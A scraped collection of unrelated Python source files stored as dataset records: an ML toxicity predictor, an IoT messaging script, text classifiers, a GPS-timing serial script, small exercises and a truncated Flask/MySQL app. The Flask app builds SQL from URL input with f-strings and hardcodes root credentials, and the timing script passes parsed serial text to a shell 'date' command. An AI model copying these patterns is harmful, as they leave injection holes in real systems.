path = ['CToxPred', 'models', 'decriptors_preprocessing', 'Nav1.5',\r\n            'nav_descriptors_preprocessing_pipeline.sav']\r\n    descriptors_transformation_pipeline = joblib.load(os.path.join(*path))\r\n    nav15_descriptors = descriptors_transformation_pipeline.transform(\r\n        nav15_descriptors)\r\n    nav15_features = np.concatenate((nav15_fingerprints, nav15_descriptors),\r\n                                    axis=1)\r\n    ## Load model\r\n    nav15_predictor = Nav15Classifier(2454, 2)\r\n    path = ['CToxPred', 'models', 'model_weights', 'Nav1.5',\r\n            '_nav15_checkpoint.model']\r\n    nav15_predictor.load(os.path.join(*path))\r\n    nav15_predictions = nav15_predictor(\r\n        torch.from_numpy(nav15_features).float().to(device)).argmax(1).cpu()\r\n\r\n    # Process Cav1.2\r\n    print('>>>>>>> Predict Cav1.2 <<<<<<<')\r\n    cav12_fingerprints = fingerprints\r\n    cav12_descriptors = descriptors\r\n    ## Load preprocessing pipeline\r\n    path = ['CToxPred', 'models', 'decriptors_preprocessing', 'Cav1.2',\r\n            'cav_descriptors_preprocessing_pipeline.sav']\r\n    descriptors_transformation_pipeline = joblib.load(os.path.join(*path))\r\n    cav12_descriptors = descriptors_transformation_pipeline.transform(\r\n        cav12_descriptors)\r\n    cav12_features = np.concatenate((cav12_fingerprints, cav12_descriptors),\r\n                                    axis=1)\r\n    ## Load model\r\n    cav12_predictor = Cav12Classifier(2586, 2)\r\n    path = ['CToxPred', 'models', 'model_weights', 'Cav1.2',\r\n            '_cav12_checkpoint.model']\r\n    cav12_predictor.load(os.path.join(*path))\r\n    cav12_predictions = cav12_predictor(\r\n        torch.from_numpy(cav12_features).float().to(device)).argmax(1).cpu()\r\n\r\n    # Generate output\r\n    results = pd.DataFrame({'SMILES': smiles_list, 'hERG': hERG_predictions,\r\n                            'Nav1.5': nav15_predictions,\r\n                            'Cav1.2': cav12_predictions})\r\n\r\n    results.to_csv('predictions.csv', index=False)\r\n\r\ndef _help():\r\n    \"\"\"\r\n    Display the usage instructions for the ctoxpred.py script.\r\n\r\n    Usage:\r\n        python ctoxpred.py <input_file>\r\n\r\n    Note:\r\n        This function prints the command format required to run the ctoxpred.py \r\n        script and provides information about the expected input file \r\n        format. 
Ensure to replace '<input_file>' with the actual path\r\n        to your SMILES input file.\r\n    \"\"\"\r\n\r\n    print(\"\\n CToxPred: A comprehensive cardiotoxicity prediction tool of small molecules \\\r\n    \\n\\t on three targets: hERG, Nav1.5, Cav1.2 \\n \\\r\n    \\n\\tTo get predictions, run the command as follows:\\n\\t $ python ctoxpred.py <input_file>.smi \\\r\n    \\n\\nWhere <input_file> is the SMILES input file to the software, and has the extension .smi \\n\")\r\n\r\nif __name__ == \"__main__\":\r\n    if len(sys.argv) == 2 and (sys.argv[1] == '--help' or sys.argv[1] == '-h'):\r\n        _help()\r\n    elif len(sys.argv) != 2:\r\n        # show the usage text when no file (or more than one argument) is given,\r\n        # instead of crashing on a missing sys.argv[1]\r\n        _help()\r\n    else:\r\n        if not sys.argv[1].endswith('.smi'):\r\n            print('File extension wrong.')\r\n        else:\r\n            with open(sys.argv[1], 'r') as file:\r\n                smiles_list = []\r\n                for smiles in file:\r\n                    smiles_list.append(smiles.strip())\r\n            _generate_predictions(smiles_list)\r\n\r\n\r\n","repo_name":"issararab/CToxPred","sub_path":"CToxPred.py","file_name":"CToxPred.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"}
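A sketch of how the CToxPred CLI above might be driven end to end; the file name and the two SMILES strings are invented for illustration, and the output columns follow the _generate_predictions docstring:

import pandas as pd

# write a minimal .smi input, one SMILES per line (hypothetical file name)
with open('compounds.smi', 'w') as f:
    f.write('CCO\n')                        # ethanol
    f.write('CC(=O)Oc1ccccc1C(=O)O\n')      # aspirin

# then, from a shell:  python ctoxpred.py compounds.smi
preds = pd.read_csv('predictions.csv')      # 0 = non-toxic, 1 = toxic per target
print(preds[['SMILES', 'hERG', 'Nav1.5', 'Cav1.2']])
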
 +{"seq_id":"33619445912","text":"from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\r\n\r\n\r\nimport json\r\n\r\n\r\nimport os\r\n\r\n# Load the endpoint from file\r\nwith open('/home/ec2-user/environment/endpoint.json') as json_file: \r\n    data = json.load(json_file)\r\n\r\n\r\ndeviceName = os.path.split(os.getcwd())[1]\r\n\r\n# Set the destinationDeviceName depending on this deviceName\r\nif deviceName == 'car1':\r\n    destinationDeviceName = 'car2'\r\nelse:\r\n    destinationDeviceName = 'car1'\r\n\r\n\r\nsubTopic = 'lab/messaging/' + deviceName\r\npubTopic = 'lab/messaging/' + destinationDeviceName\r\nkeyPath = 'private.pem.key'\r\ncertPath = 'certificate.pem.crt'\r\ncaPath = '/home/ec2-user/environment/root-CA.crt'\r\nclientId = deviceName\r\nhost = data['endpointAddress']\r\nport = 8883\r\n\r\n\r\n\r\nmyAWSIoTMQTTClient = AWSIoTMQTTClient(clientId)\r\nmyAWSIoTMQTTClient.configureEndpoint(host, port)\r\nmyAWSIoTMQTTClient.configureCredentials(caPath, keyPath, certPath)\r\nmyAWSIoTMQTTClient.connect()\r\n\r\n\r\n\r\n\r\n\r\ndef customCallback (client, userdata, message):\r\n    print(\"Received message : \" + message.payload.decode() + \" from topic \" + message.topic) \r\n\r\n\r\n\r\n\r\n\r\n\r\nmyAWSIoTMQTTClient.subscribe(subTopic, 1, customCallback)\r\n\r\n\r\n\r\ndef publishToIoTTopic(topic, payload):\r\n    myAWSIoTMQTTClient.publish(topic, payload, 1)\r\n    \r\n    \r\n    \r\n\r\n\r\n# Infinite loop reading console input and publishing what it finds\r\nwhile True:\r\n    message = input('Enter a message on the next line to send to ' + pubTopic + ':\\r\\n')\r\n    \r\n    # Calling function to publish to IoT Topic\r\n    publishToIoTTopic(pubTopic, message)\r\n","repo_name":"Manith-2001/Projects","sub_path":"messaging.py","file_name":"messaging.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"89717638","text":"from sklearn.feature_extraction.text import CountVectorizer\n# from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import f1_score, classification_report\n# from sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nimport os\nimport pickle\n\n\ndef run_lr_3gram(data_name, train_path, test_path):\n    \"\"\"\n\n    :param data_name:\n    :type data_name: str\n    :param train_path: training file path\n    :type train_path: str\n    :param test_path: testing file path\n    :type test_path: str\n    :return:\n    \"\"\"\n    print('Working on: '+data_name)\n    # check if the vectorizer and classifier already exist;\n    # if not, build the vectorizer\n    if not (os.path.exists('./vects/lr_' + data_name + '.pkl') and\n            os.path.exists('./clfs/lr_' + data_name + '.pkl')):\n\n        print('Loading Training data........')\n        # load the training data\n        train_docs = []\n        train_labels = []\n        with open(train_path) as train_file:\n            cols = train_file.readline()  # skip the 1st column names\n            cols = cols.strip().split('\\t')\n            doc_idx = cols.index('text')  # document index\n            label_idx = cols.index('label')  # label index\n\n            for line in train_file:\n                if len(line.strip()) < 5:\n                    continue\n                \n                infos = line.strip().split('\\t')\n                train_labels.append(int(infos[label_idx]))\n                train_docs.append(infos[doc_idx].strip())\n        print(np.unique(train_labels))\n        \n        print('Fitting Vectorizer.......')\n        vect = CountVectorizer(ngram_range=(1, 3), max_features=15000, min_df=2)\n        vect.fit(train_docs)\n        pickle.dump(vect, open('./vects/lr_'+data_name+'.pkl', 'wb'))  # save the vectorizer\n\n        print('Transforming Training data........')\n        train_docs = vect.transform(train_docs)\n\n        # fit the model\n        print('Building model............')\n        if len(np.unique(train_labels)) > 2:\n            # clf = SGDClassifier(loss='log', class_weight='balanced')\n            clf = LogisticRegression(class_weight='balanced', multi_class='auto')\n        else:\n            # clf = SGDClassifier(loss='log', class_weight='balanced')\n            clf = LogisticRegression(class_weight='balanced')\n        clf.fit(train_docs, train_labels)\n        pickle.dump(clf, open('./clfs/lr_' + data_name + '.pkl', 'wb'))  # save the classifier\n    else:\n        vect = pickle.load(open('./vects/lr_'+data_name+'.pkl', 'rb'))\n        clf = pickle.load(open('./clfs/lr_'+data_name+'.pkl', 'rb'))\n\n    # load the test data\n    test_docs = []\n    test_labels = []\n    with open(test_path) as test_file:\n        cols = test_file.readline()  # skip the 1st column names\n        cols = cols.strip().split('\\t')\n        doc_idx = cols.index('text')  # document index\n        label_idx = cols.index('label')  # label index\n        for line in test_file:\n            if len(line.strip()) < 5:\n                continue\n            infos = line.strip().split('\\t')\n            test_labels.append(int(infos[label_idx]))\n            test_docs.append(infos[doc_idx].strip())\n\n    # transform the test data\n    print('Testing.........')\n    test_docs = vect.transform(test_docs)\n    y_preds = clf.predict(test_docs)\n\n    with open('./results/lr_results.txt', 'a') as writefile:\n        writefile.write(data_name + '_________________\\n')\n        writefile.write(str(f1_score(y_pred=y_preds, y_true=test_labels, average='weighted'))+'\\n')\n        report = classification_report(y_pred=y_preds, y_true=test_labels, digits=3)\n        print(report)\n        writefile.write(report + '\\n')\n        writefile.write('.........................\\n')\n\n\nif __name__ == '__main__':\n    # create directories for saving models and tokenizers\n    if not os.path.exists('./vects/'):\n        os.mkdir('./vects/')\n    if not os.path.exists('./clfs/'):\n        os.mkdir('./clfs/')\n    if not os.path.exists('./results/'):\n        os.mkdir('./results/')\n\n    data_list = [\n        'imdb',\n        'yelp',\n        'amazon_health',\n    ]\n\n    for dname in data_list:\n        train_raw_path = '../data/raw/'+dname+'/train.tsv'\n        test_raw_path = '../data/raw/'+dname+'/test.tsv'\n        run_lr_3gram(dname, train_raw_path, test_raw_path)\n","repo_name":"xiaoleihuang/UserEmbedding","sub_path":"personalize/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
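run_lr_3gram above pickles the vectorizer and the classifier as two separate artifacts that must always be loaded in matching pairs. A sketch of the same 1-3-gram logistic-regression setup bundled as a single sklearn Pipeline, so one pickle carries both steps; train_docs/train_labels stand in for the lists built inside run_lr_3gram, and the pipeline file name is made up:

import pickle
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression

model = Pipeline([
    ('vect', CountVectorizer(ngram_range=(1, 3), max_features=15000, min_df=2)),
    ('clf', LogisticRegression(class_weight='balanced')),
])
# model.fit(train_docs, train_labels)
# with open('./clfs/lr_pipeline.pkl', 'wb') as fh:
#     pickle.dump(model, fh)        # vectorizer and classifier travel together
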
 +{"seq_id":"26029524826","text":"# Original code by Mehmet Ozturk \n# Modified by Sebastiaan van Essen 07/2016\n# This code combines the time precision of the GNSS network and data from ALM sensors\n# and sends the data via Ethernet to a computer as a stand-alone module.\n#\n\n#from _overlapped import NULL\n#from test.support import temp_cwd\n\n\n#///////////////////////////////// Importing modules for functions later used ///////////////////////\n\nimport os                # importing the possibility to operate system commands\nimport sys               # Importing the possibility to use some system variables\nimport serial            # Importing the possibility to use serial communication\nimport threading         # Importing the possibility to run multiple operations at the same time\nimport datetime          # Importing some (system) clock operations\nimport time              # Importing some (system) clock operations\nimport logging           # importing the possibility to track events and log them\nimport socket            # Importing Networking interface\nsys.path.append(r'/home/pi/pysrc')\nimport Adafruit_BBIO.GPIO as GPIO  # readying the code for GPIO usage\n#import pydevd           # Import remote debugger\nimport string\n\n\n\n#///////////////////////////////// Defining variables used for the data splitting ///////////////////\n\n\n# These variables are for the parsing of the ZDA data\nsDag = ''\nsMaand = ''\nsJaar = ''\nsUur = ''\nsMinuut = ''\nsSecond = ''\nsMSecond = ''\ndatum = ''\ntijd = ''\n\n# These variables are for the parsing of the AML data\n\nstatus = 'st'\ndataToSend = '$SBDAML,,,,,,,,ST' + '\\r\\n'\n\n# These variables are used to pull the time from the systemclock and use them for tagging\nsDagNu = ''\nsMaandNu = ''\nsJaarNu = ''\nsUurNu = ''\nsMinuutNu = ''\nsSecondNu = ''\nsMSecondNu = ''\ndatumNu = ''\ntijdNu = ''\nsetTime = ''\ndatumTijd = ''\n#freshTime = 0\n\n#///////////////////////////////// Defining triggers for functions /////////////////////////////////\n\nbTrigger = False         # This trigger is used for the PPS input\nbZdaOntvangen = False    # This trigger is to keep track of the \"freshness\" of the ZDA time info\nbAmlOntvangen = False    # This trigger is to see if there is unsent AML info.\n\n\n#///////////////////////////////// Error/debug logging functionality ///////////////////////////////\n\nlogging.basicConfig(level=logging.DEBUG,\n                    format='[%(levelname)s] (%(threadName)-10s) %(message)s',\n                    )\n\n\n#///////////////////////////////// GPIO configuration ////////////////////////////////////////////////\n\n#Configuring the general pins for input/output (GPIO)\n#GPIO.setmode(GPIO.BCM)  # setup GPIO using Board numbering\nGPIO.setup(\"P9_42\", GPIO.IN, pull_up_down=GPIO.PUD_DOWN)  # setting Pin 7 as input, also a pull-down resistor is turned on internally\n\n\n#/////////////////// Serial communication configurations ///////////////////////////////////////////\n\n#Open Com port of GPZDA (connected via pin 8 and 10 of GPIO)\nserZda = serial.Serial('/dev/ttyO1')  # Linking serZDA to the correct Com port\nserZda.baudrate = 9600                # Setting the communication speed of the serial port\nserZda.isOpen()                       # Open serial port\n\n\n#Open Com port of AML (connected via USB)\nserAml = serial.Serial('/dev/ttyO2')  # Linking serAml to the correct Com port\nserAml.baudrate = 38400               # Setting the communication speed of the serial port\nserAml.isOpen()                       # Open serial port\n\n\n\n\n#///////////////////////////////// Processing the incoming data by splitting it and putting it in usable variables //////////\n\n\n\n    #Clearing data from AML\n\ndef clearAml():\n    global status\n    global datumNu; datumNu = ''\n    
global dataToSend; dataToSend = '$SBDAML,,,,,,,,' + status + '\r\n'\n    print ('AML cleared\r\n')\n#    writeCom2('AML cleared\r\n')\n\n    #Pulling the time from the system and write it into a usable variable\n\ndef getTime():\n\n    currentDateTimeRaw = datetime.datetime.now() + datetime.timedelta(seconds =1)\n    currentDateTime = currentDateTimeRaw.strftime('%H:%M:%S.%f,%d,%m,%Y')\n    currentTime = currentDateTime.split(',')  # with split() each comma separated piece of currentDateTime is written in array currentTime. \n    \n    global tijdNu; tijdNu = currentTime[0]    # Splitting the array into time \n    global sDagNu; sDagNu = currentTime[1]    # Day\n    global sMaandNu; sMaandNu = currentTime[2]  # Month \n    global sJaarNu; sJaarNu = currentTime[3]  # And year \n    global datumNu; datumNu = sDagNu + '-' + sMaandNu + '-' + sJaarNu + ',' + tijdNu  # The combined data of day+month+year makes the variable datumNu (date) \n\n\n\n\n    #Splitting the ZDA data into 8 variables, then process it to time and date\n\ndef parseZda(raw_message):\n    global bZdaOntvangen\n    global status\n    \n    if raw_message is None:          # if no data is sent stop the madness\n        return None\n    bZdaOntvangen = False\n    status = \"IZ\"\n    \n    try:\n        sLines = raw_message.split(',')  # with split() each comma separated piece of raw_message is written in array sLines. \n        if len(sLines) < 7:              # if the data contains fewer than 7 fields\n            return None\n        if len(sLines[1]) < 9:           # or the time field is shorter than 9 characters\n            return None                  # do nothing\n        \n        tempTijd = sLines[1]             # tempTijd is the 2nd string of data from array sLines \n        global sUur; sUur = tempTijd[:2]          # the first two digits are the hours\n        global sMinuut; sMinuut = tempTijd[2:4]   # digits 3 and 4 are minutes \n        global sSecond; sSecond = tempTijd[4:6]   # digits 5 and 6 are seconds \n        global sMSecond; sMSecond = tempTijd[7:]  # all digits from 7 and up are milliseconds \n        global tijd; tijd = sUur + ':' + sMinuut + ':' + sSecond + '.' + sMSecond  #Time in format HH:MM:SS \n        \n        if len(sLines[2]) < 2 or len(sLines[3]) < 2 or len(sLines[4]) < 2:  # if the day, month or year field is shorter than 2 characters, discard the data\n            return None\n        global sDag; sDag = sLines[2]    # the 3rd string of sLines is the day\n        global sMaand; sMaand = sLines[3]  # the 4th string of sLines is the month \n        global sJaar; sJaar = sLines[4]  # the 5th string of sLines is the year \n        global datum; datum = sJaar + '-' + sMaand + '-' + sDag  # The combined data of day+month+year makes the variable datum (date) \n#        return ' ZDA OK' + ' >> ' +datum + ' ' + tijd  # Send confirmation + data (ZDA OK >> parsed data ) to console and Com1\n        global datumTijd; datumTijd = \"'\" + datum + ' ' + tijd +\"'\"  # Quote the combined date and time so it can be passed to the system 'date -s' call later\n#        print (datumTijd)\n#        status = \"00\"\n        return ' ZDA OK' + ' >> ' + datumTijd  # Send confirmation + data (ZDA OK >> parsed data ) to console and Com1\n\n    except Exception as e:               # if something goes wrong print the error to console\n#        bZdaOntvangen = False\n#        status = \"IZ\" \n        print ('Exception: ' + str(e))\n\n\n    #Splitting the AML Data into variables and combining with time\n\ndef parseAml (raw_mess):\n    global sLineAml; sLineAml = raw_mess.split(' ')  # with split() each space separated piece of raw_mess is written in array sLineAml. \n    if len(sLineAml) < 4:                # if the data has fewer than 4 fields there is nothing useful to build\n        return None                      # return stops the function if the \"if statement\" is met (see above)\n    getTime()                            # Get the current system time and put it in datumNu\n    global dataToSend                    # make dataToSend (variable) usable in this function\n    global status                        # Do the same as above, but for status\n\n    if 4 <= len(sLineAml) <= 18:         # one comma-join covers the 4- to 18-field readings that were previously enumerated branch by branch\n        dataToSend = '$SBDAML' + ',' + datumNu + ',' + ','.join(sLineAml[1:]) + ',' + status + '\r\n'\n\n    status = \"NC\"\n    del sLineAml                         # Clearing out the data from sLineAml so no old data is processed the next time\n    return ' ALM OK'+' >> '+ dataToSend  # Send confirmation + data (AML OK >> parsed data ) to console\n\n\n#///////////////////////////////// Serial receive loops /////////////////////////////////////////////\n\n\n    #Serial ZDA (Com1)\n    \ndef serZdaReader():\n    \n    while True:                          # Run forever\n        bLine = serZda.readline()        # Read the incoming data from serial ZDA and put it in bLine\n        try:\n            sLine = bLine.decode(encoding='utf_8')  # decode it into usable data \n\n        except:\n            pass\n\n        pass\n        global bZdaOntvangen\n        global status\n        print (' COM1 ZDA: ' +sLine)     # Write the raw data to terminal\n        datumtijd = parseZda(sLine)      # parse the raw data string into usable variables\n        if datumtijd == None:            # if there is no usable data print \"datumtijd is none\"\n            print('Datumtijd is none:')\n            bZdaOntvangen = False\n            status = \"IZ\"\n            \n        else:                            # If the data is usable \n\n#            if status == \"NZ\":\n#                status = \"FC\"\n#                datumtijd = False\n#            else:\n            bZdaOntvangen = True         # The trigger that the data is fresh is put to true\n            print ('ZDA out' + ' ' + datumtijd + '\\r\\n'+ '\\r\\n')  # Print the usable date and time to terminal\n#            status = \"OK\"\n    \n
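A quick check of the comma-join that builds the $SBDAML sentence in parseAml above; the four-field AML reading and the timestamp below are invented for illustration:

sample = ['.AML', '21.33', '35.12', '1482.1']       # hypothetical raw AML fields
datum = '17-02-2017,10:15:01.000000'
line = '$SBDAML' + ',' + datum + ',' + ','.join(sample[1:]) + ',' + 'NC' + '\r\n'
# -> '$SBDAML,17-02-2017,10:15:01.000000,21.33,35.12,1482.1,NC\r\n'
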
\n    #Serial AML (Com2)\ndef serAmlReader():\n    \n    while True:                          # loop forever\n        b1Line = serAml.readline()       # read the line from serial AML and write it to b1Line\n        s1Line = b1Line.decode(encoding='utf_8')  # Decode the data from serial AML to usable data\n        s1Line = s1Line.rstrip(' ' +'\\r\\n')\n\n        pass\n        print (' COM2 AML: '+s1Line)     # Print the raw data to console \n        print ( datetime.datetime.now()) # Print to console AML was received\n        isAmlValid = parseAml(s1Line)    # turn the raw data into usable data blocks\n        global bZdaOntvangen\n        if isAmlValid == None:           # if the data is garbage print \"AML not valid\" to console\n            print('AML not valid')\n            \n        else:\n#            bAlmOntvangen = True        # If the data is not garbage do the following\n            print (isAmlValid+ '\\r\\n'+ '\\r\\n')  # Print status (OK) to console \n\n\n#////////////////////////////////////// Serial Write loops /////////////////////////////////////////////\n\n\ndef writeCom1(textToWrite):              # Serial port 1 ZDA Writer\n    serZda.write(textToWrite.encode(encoding='utf_8', errors='strict'))  # Encode data to serial protocol for Com1\n\n\ndef writeCom2(textToWrite):              # Serial port 2 AML Writer\n    serAml.write(textToWrite.encode(encoding='utf_8', errors='strict'))  # Encode data to serial protocol for Com2\n\n\n\n#///////////////////////////////// This is what happens when pin 7 (PPS) goes high ///////////////////\n\n    #When pulse() is used this is what happens\ndef pulse(channel):\n#    global bTrigger; bTrigger = True    # First the bTrigger is set to True to show a fresh pulse has been received \n    print('trigger' )                    # Give the terminal that PPS was received\n    print (datetime.datetime.now())      # Print to console PPS was received\n    global bZdaOntvangen\n    global datumTijd\n    global status\n    print (bZdaOntvangen)\n\n\n\n    if bZdaOntvangen == True:\n        bZdaOntvangen = False\n        os.system('date -s %s' % datumTijd)  # Sets the system time to datumTijd (the time set per ZDA)\n        datumtijd = False\n        status = \"OK\"\n    else:\n        status = 'NZ'\n        bZdaOntvangen = False\n\n#    bZdaOntvangen = False\n    \n    #This is the detector that sees the pin goes high then starts the function pulse\nGPIO.add_event_detect(\"P9_42\", GPIO.RISING, callback=pulse, bouncetime = 300)  # add rising edge detection on a channel the rest of your program...\n\n\n\n\n\n#////////////////////////////////////// Ethernet write loops //////////////////////////////////////////\n\n\nUDP_IP = \"192.168.1.22\"\n#UDP_IP = \"192.168.1.22\"\nUDP_PORT = 5001\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef UDPsender():\n    while True:\n\n        print('Send over Ethernet')      # send to console that data is being sent over ethernet \n        global dataToSend; print (dataToSend + '\\r\\n')  # Print to console the message sent to Ethernet\n        sock.sendto(bytes(dataToSend, \"utf-8\"), (UDP_IP, UDP_PORT))  # UDP payloads must be bytes in Python 3, so encode the string before sending\n#        global status; status = \"AZ\"\n        clearAml()\n        time.sleep(1)                    # Wait for a second (minus runtime of the code) and repeat\n\n\n#//////////////////////////////////// Serial loop ////////////////////////////////////////////////////\n\n\n#Start thread Ethernet UDP\nthrUDP = threading.Thread(name='UDPsender', target=UDPsender)  # Create a thread for the UDP sender (thrUDP) \nthrUDP.start()                           # Start said thread\n\n#Start thread serial 1 ZDA Reader\nthrZda = threading.Thread(name='serZdaReader', target=serZdaReader)  # Create a thread for serial communication(thrZDA) \nthrZda.start()                           # Start said thread\n\n#Start thread serial 2 AML Reader\nthrAml = threading.Thread(name='serAmlReader', target=serAmlReader)  # Create a thread for serial communication(thrAML) \nthrAml.start()                           # Start 
said thread\n\n\n\n\n                         # terminate thread\n","repo_name":"JSeabed/Bathy","sub_path":"Backup/Demoday Version/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":21516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28717832818","text":"# Problem: https://www.hackerrank.com/challenges/validate-list-of-email-address-with-filter/problem\n\nimport re\ndef fun(s):\n    # return True if s is a valid email, else return False\n    try:\n        username = s.split('@')[0]\n        website = s.split('@')[1].split('.')[0]\n        extension = s.split('@')[1].split('.')[1]\n        if (len(username) > 0) and (len(website) > 0) and (len(extension) > 0) and \\\n            re.match(\"^[A-Za-z0-9_-]*$\", username) and \\\n            re.match(\"^[A-Za-z0-9]*$\", website) and \\\n            re.match(\"^[A-Za-z]*$\", extension) and (len(extension) <= 3):\n            return True\n        else: return False\n    except:\n        return False\n\ndef filter_mail(emails):\n    return list(filter(fun, emails))\n\n\nn = int(input())\nemails = []\nfor _ in range(n):\n    emails.append(input())\n\nfiltered_emails = filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)","repo_name":"clago7/HackerRank-Preparation","sub_path":"Python/12. Python Functionals/12.2 Validating Email Addresses With a Filter.py","file_name":"12.2 Validating Email Addresses With a Filter.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33512512940","text":"from common import *\n\n\ndef traverse_tree(file_name=None, node_index=0, classifier=None):\n    eps = 0.1\n    tree = classifier\n    if node_index == 0:\n        file = os.getcwd() + '\\\\' + file_name\n        f = open(file, 'w')\n        f.close()\n    else:\n        file = file_name\n    left_node_index = 2 * node_index + 1\n    right_node_index = 2 * node_index + 2\n\n    if node_index != 0:\n        level = int(np.floor(np.log2(node_index - eps)))\n        if tree[node_index].classes is not None:\n            contents = str('| ' * level + '|--- {}'.format(tree[node_index]))\n            print(contents)\n            f = open(file, 'a')\n            f.write(contents + '\\n')\n            f.close()\n    if (left_node_index >= len(tree)) or (right_node_index >= len(tree)):  # use >= so child indexes never run past the last valid tree slot\n        return 0\n    traverse_tree(node_index=left_node_index, file_name=file)\n    traverse_tree(node_index=right_node_index, file_name=file)\n    return 0\n\n\ndef push(STACK, node, top):\n\n    STACK.append(node)\n    top += 1\n\n    return STACK, top\n\n\ndef pop(STACK, top):\n\n    return STACK.pop(), top-1\n\n\ndef traverse_tree_make_graph( file_name=None, node_index=0, classifier=None, count=0):\n    eps = 0.1\n\n    # level = 0\n    tree = classifier\n    top = -1\n    stack = list()\n    stack, top = push(stack, tree[node_index], top)\n\n    while True:\n\n        if not stack:  # 'stack is []' is always False; test emptiness instead so the loop can terminate\n            break\n\n        current_node, top = pop(stack, top)\n\n        if current_node.classes is not None:\n            print(current_node.classes)\n            stack, top = push(stack, tree[2*tree.index(current_node)+2], top)\n            stack, top = push(stack, tree[2*tree.index(current_node)+1], top)\n\n\ndef bootstrap(X,y, n_classifier=10, mode='sqrt'):\n\n    bootstrapped_data = list()\n    bootstrapped_X = list()\n    bootstrapped_y = list()\n    iters = n_classifier\n\n    num_of_data = 0\n    max_feature = int(np.ceil(np.sqrt(len(X.columns))))\n    index = np.arange(0, len(X.columns))\n    columns = list(X.columns)\n\n    if mode == 'sqrt':   # compare string values with ==, not identity\n        num_of_data = int(np.ceil(np.sqrt(len(X))))\n\n    elif mode == 'total':\n        num_of_data = len(X)\n\n    for iter in range(iters):\n        select_col = list()\n        select_feature = np.random.choice(index, max_feature, replace=False)\n        for f in select_feature:\n            select_col.append(columns[f])\n        bootstrapped_index = list(set(np.random.randint(0, len(X), size=num_of_data)))\n        temp = pd.merge(X[select_col].iloc[bootstrapped_index], y.iloc[bootstrapped_index], left_index=True, right_index=True)\n        bootstrapped_data.append(temp)\n        bootstrapped_X.append(X[select_col].iloc[bootstrapped_index])\n        bootstrapped_y.append(y.iloc[bootstrapped_index])\n\n    return bootstrapped_data, bootstrapped_X, bootstrapped_y\n","repo_name":"gomljo/DecisionTreeForPaper","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
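A sketch of calling bootstrap() above on a toy frame; the column names and the 100-row random table are invented, and np/pd are assumed to be provided by `common` as in the module:

import numpy as np
import pandas as pd

X = pd.DataFrame(np.random.rand(100, 9), columns=[f'f{i}' for i in range(9)])
y = pd.Series(np.random.randint(0, 2, size=100), name='label')

data, Xs, ys = bootstrap(X, y, n_classifier=10, mode='sqrt')
# 10 bootstrap samples; each uses ceil(sqrt(9)) = 3 random feature columns and
# at most ceil(sqrt(100)) = 10 rows drawn with replacement (duplicates deduped)
print(len(Xs), Xs[0].shape)
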
 +{"seq_id":"2353626853","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\n\nhere = path.abspath(path.dirname(__file__))\n\nlong_description = ''\nif path.isfile('README.md'):\n    with open(path.join(here, 'README.md'), encoding='utf-8') as f:\n        long_description = f.read()\n\nrequirements = []\nif path.isfile('requirements.txt'):\n    with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:\n        requirements = [line.strip() for line in f]\n\nsetup(\n    name='python_dhl_germany',\n    version='0.3.4.10',\n    description='',\n    long_description=long_description,\n    long_description_content_type='text/markdown',\n    keywords='',\n    author='Johannes Eimer Production (JEP)',\n    author_email='info@jep-dev.com',\n    license='MIT',\n    url='',\n    packages=find_packages(exclude=['contrib', 'docs', 'tests', \"tests*\"]),\n    data_files=[('', [\n        'dhl/wsdl/3.4.0/geschaeftskundenversand-api-3.4.0-schema-bcs_base.xsd',\n        'dhl/wsdl/3.4.0/geschaeftskundenversand-api-3.4.0-schema-cis_base.xsd',\n        'dhl/wsdl/3.4.0/production.wsdl',\n        'dhl/wsdl/3.4.0/test.wsdl',\n    ])],\n    include_package_data=True,\n    install_requires=requirements,\n    python_requires='>=3.9'\n)\n","repo_name":"FourZeroOne/python_dhl_germany","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73311882649","text":"from flask import Flask, jsonify, request\n\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\n# MySQL credentials\n\napp.config['MYSQL_HOST']= 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'root'\napp.config['MYSQL_DB'] = 'colegio'\n\n# Create a MySQL object and pass it the configuration\n\nmysql = MySQL(app)\n\n@app.route('/colegio/traer/<palabra>')\n\ndef traer(palabra):\n    cur = mysql.connection.cursor()\n    cur.execute(f\"select M.mat_nivel, E.est_cod, E.est_dni, E.est_nombres, E.est_ape_pat, E.est_ape_mat, E.est_fecha_nacimiento, E.est_sexo from matricula as M inner join estudiante as E on M.mat_id = E.id_mat where mat_nivel = '{palabra}' \")\n    data = cur.fetchall()\n    cur.close()\n    print(data)\n    \n    return jsonify(data)\n\n\n\n@app.route('/colegio/turnos/')\n\ndef contar():\n    cur = mysql.connection.cursor()\n    cur.execute(f\"select count(mat_turno), mat_turno from matricula group by mat_turno\")\n    data = cur.fetchall()\n    cur.close()\n    print(data)\n    \n    return jsonify(data)\n\n\n@app.route('/lista/agregar', methods=['POST'])\ndef agregar_lista():\n    info = request.get_json()\n    if(info['nombre']):\n        # Create a database connection\n        cur = mysql.connection.cursor()\n        print('Ok')\n        